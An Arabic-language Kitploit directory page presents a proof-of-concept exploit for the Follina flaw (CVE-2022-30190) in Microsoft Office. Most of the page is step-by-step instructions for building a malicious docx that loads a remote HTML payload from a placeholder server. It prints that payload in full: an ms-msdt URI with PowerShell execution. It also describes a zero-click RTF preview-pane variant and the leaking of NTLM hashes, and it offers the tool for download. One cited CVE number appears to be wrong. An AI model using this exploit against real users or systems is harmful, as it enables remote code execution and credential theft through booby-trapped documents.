Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC-CVE-2022-30190 — POC CVE-2022-30190 : CVE 0-day MS Offic RCE المعروف أيضًا باسم msdt follina | Kitploit
أدوات/GitHubGitHub/jmousqueton/poc-cve-2022-30190
أدوات التصيدتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةاستغلال تطبيقات الويبالقيادة والسيطرة
GitHubjmousqueton/poc-cve-2022-30190

PoC-CVE-2022-30190

POC CVE-2022-30190 : CVE 0-day MS Offic RCE المعروف أيضًا باسم msdt follina

عرض المستودع
15752منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

POC CVE-2022-30190 : CVE 0-day MS Offic RCE المعروف بـ msdt follina

معلومة : ثغرة يوم الصفر الجديدة في Microsoft Office تُستخدم في هجمات لتنفيذ PowerShell

ملخص

في 29 مايو 2022، اكتشف فريق Nao_Sec، وهو فريق مستقل لأبحاث الأمن السيبراني، مستند Office ضارًا تمت مشاركته على Virustotal. يستخدم هذا المستند مخططًا غير معتاد ولكنه معروف لإصابة ضحاياه. لم يتم اكتشاف هذا المخطط كضار من قبل بعض حلول EDR، مثل Microsoft Defender for Endpoint. قد تؤدي هذه الثغرة إلى تنفيذ التعليمات البرمجية دون الحاجة إلى تفاعل المستخدم، حيث لا تتضمن وحدات ماكرو، إلا إذا كان وضع العرض المحمي مفعلًا. لم يُنسب رقم CVE بعد.

التفاصيل التقنية

يتم استغلال الثغرة باستخدام مخطط URI الخاص بـ MSProtocol لتحميل بعض التعليمات البرمجية. يمكن للمهاجمين تضمين روابط ضارة داخل مستندات Microsoft Office أو القوالب أو رسائل البريد الإلكتروني تبدأ بـ ms-msdt: وسيتم تحميلها وتنفيذها بعد ذلك دون تفاعل المستخدم - إلا إذا كان وضع العرض المحمي مفعلًا. ومع ذلك، فإن تحويل المستند إلى تنسيق RTF يمكن أيضًا أن يتجاوز ميزة العرض المحمي.

إثبات المفهوم

قد تحتوي ملفات docx الخاصة بـ MS Office على مراجع OLE Object خارجية كملفات HTML. يوجد مخطط HTML يُدعى "ms-msdt:" والذي يستدعي أداة التشخيص msdt، وهي قادرة على تنفيذ تعليمات برمجية عشوائية (محددة في المعاملات).

النتيجة هي ناقل هجوم مرعب للحصول على RCE من خلال فتح ملفات docx ضارة (دون استخدام وحدات ماكرو).

فيما يلي خطوات بناء مستند docx كإثبات مفهوم:

  1. افتح Word (استخدم الإصدار المحدث 2019 Pro، 16.0.10386.20017)، وأنشئ مستندًا تجريبيًا، وأدرج كائن (OLE) (كصورة نقطية (Bitmap))، ثم احفظه بصيغة docx.

  2. حرّر word/_rels/document.xml.rels في بنية docx (إنه ملف zip عادي). عدّل وسم XML <Relationship> مع السمة

root@kitploit:~
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

وTarget="embeddings/oleObject1.bin" عن طريق تغيير قيمة Target وإضافة السمة TargetMode:

root@kitploit:~
Target = "http://<payload_server>/payload.html!"
TargetMode = "External"

لاحظ قيمة Id (من المحتمل أنها "rId5").

  1. حرّر word/document.xml. ابحث عن وسم <o:OLEObject ..> (مع r:id="rId5") وغيّر السمة من Type="Embed" إلى Type="Link" وأضف السمة UpdateMode="OnCall".

ملاحظة: ملف docx الضار الناتج هو تقريبًا نفس الملف الخاص بـ CVE-2021-44444.

  1. قدّم الحمولة html الخاصة بـ PoC (مشغل calc.exe) باستخدام مخطط ms-msdt على http://<payload_server>/payload.html:
root@kitploit:~
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>

</body>
</html>

لاحظ ما يلي:

  • يجب تكرار سطر التعليق الذي يحتوي على AAA أكثر من 60 مرة (الحد الأدنى 4096 بايت).
  • كان مطلوبًا في البداية اجتيازان على الأقل للدليل /../ في بداية معامل IT_BrowseForFile
  • الكود الملفوف داخل $() سيتم تنفيذه عبر PowerShell، لكن المسافات قد تكسره
  • يجب أن يكون ".exe" هو السلسلة النهائية الأخيرة الموجودة في نهاية معامل IT_BrowseForFile

بالإضافة إلى ذلك، يمكن للحمولة المحفزة التواصل مع مواقع بعيدة. ورغم أنه من غير المرجح أن تستدعي برنامجًا ثنائيًا غير موثوق، فإن الاتصال سيحمل مع ذلك تجزئات NTLM (مما يعني أن المهاجمين أصبح لديهم الآن تجزئة لكلمة مرور Windows الخاصة بالضحية) والتي يمكن استخدامها من قبل الخصم لمزيد من مراحل ما بعد الاستغلال.

مكافأة (نسخة RTF بدون نقرة)

إذا قمت أيضًا بإضافة هذه العناصر تحت عنصر <o:OLEObject> في word/document.xml في الخطوة 3:

root@kitploit:~
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

عندها سيعمل أيضًا كملف RTF (افتح ملف docx الناتج واحفظه بصيغة RTF).

مع RTF، لا حاجة لفتح الملف في Word، يكفي تصفح الملف وإلقاء نظرة عليه في جزء المعاينة. يؤدي جزء المعاينة إلى تشغيل الحمولة HTML الخارجية ويحدث RCE دون أي نقرات.

المصادر:

  • https://nao-sec.org/about
  • https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection
  • https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 (الكود الأصلي)
  • https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
  • https://github.com/sinjap/PoC-CVE-2022-30190 (معلومات إضافية)
  • https://github.com/JohnHammond/msdt-follina (سكربت)
تنزيل الأداة